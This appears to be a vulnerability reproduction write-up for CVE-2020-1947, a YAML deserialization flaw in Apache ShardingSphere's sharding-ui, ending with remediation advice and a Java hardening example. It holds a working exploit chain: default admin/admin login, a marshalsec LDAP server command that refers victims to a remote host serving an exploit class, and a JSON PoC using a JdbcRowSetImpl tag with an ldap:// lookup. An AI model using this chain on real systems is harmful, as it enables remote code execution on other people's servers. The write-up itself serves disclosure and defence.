Preface
Apache ShardingSphere is an ecosystem of open-source distributed database middleware solutions. It consists of three independent products: Sharding-JDBC, Sharding-Proxy and Sharding-Sidecar (planned).
Environment setup
wget https://archive.apache.org/dist/incubator/shardingsphere/4.0.0/apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz
tar -zxvf apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz
Enter the bin directory and start sharding-ui:
./start.sh
Vulnerability reproduction
Open yourIP:8088 and log in with admin/admin (the default) to reach the configuration page.
Download ZooKeeper:
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
Install ZooKeeper, edit zoo.cfg, and start it on port 2181.
First go to Registry Center and add a registry center, then test that the connection succeeds.
Go to Rule Config, add a new rule, fill in the payload, and click Commit to execute the command.
Here we use marshalsec:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.111.129:8000/#ExportObject
PoC:
{
"name": "CVE-2020-1947",
"ruleConfiguration": " encryptors:\n encryptor_aes:\n type: aes\n props:\n aes.key.value: 123456abc\n encryptor_md5:\n type: md5\n tables:\n t_encrypt:\n columns:\n user_id:\n plainColumn: user_plain\n cipherColumn: user_cipher\n encryptor: encryptor_aes\n order_id:\n cipherColumn: order_cipher\n encryptor: encryptor_md5",
"dataSourceConfiguration": "!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:1389/ExportObject\n autoCommit: true"
}
The response was a 404, but the command executed successfully.
Remediation
Upgrade to the latest version.
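As an added example (not code from the original writeup or from ShardingSphere), the Java snippet below shows why a restricted SnakeYAML constructor is the relevant hardening for this bug class: a document shaped like the PoC's dataSourceConfiguration, carrying a global tag, is rejected before any class is instantiated, while tag-free YAML still loads normally. It assumes SnakeYAML 1.33 or later on the classpath; the LDAP host is a placeholder.

```java
import java.util.Map;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class RestrictedYamlLoad {

    // Constructed sample mirroring the shape of the PoC's dataSourceConfiguration;
    // the LDAP host is a placeholder, not a real server.
    static final String TAGGED_DOC =
        "!!com.sun.rowset.JdbcRowSetImpl\n"
      + "dataSourceName: ldap://PLACEHOLDER-HOST:1389/ExportObject\n"
      + "autoCommit: true\n";

    // Constructed sample of an ordinary, tag-free data source configuration.
    static final String PLAIN_DOC =
        "dataSourceName: ds_0\n"
      + "autoCommit: true\n";

    // SafeConstructor only builds standard YAML types (maps, lists, scalars).
    // A global tag such as !!com.sun.rowset.JdbcRowSetImpl raises a
    // ConstructorException instead of instantiating the named class.
    static Object loadRestricted(String doc) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(doc);
    }

    // Returns true if the document parses under the restricted constructor,
    // false (after logging the parser's reason) if it was rejected.
    static boolean isAccepted(String doc) {
        try {
            loadRestricted(doc);
            return true;
        } catch (YAMLException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("plain accepted: " + isAccepted(PLAIN_DOC));
        System.out.println("tagged accepted: " + isAccepted(TAGGED_DOC));
        Map<?, ?> cfg = (Map<?, ?>) loadRestricted(PLAIN_DOC);
        System.out.println("dataSourceName = " + cfg.get("dataSourceName"));
    }
}
```

The log line printed for the rejected document is also a useful detection signal: a configuration submission that fails with "could not determine a constructor for the tag" names the class an attacker tried to instantiate.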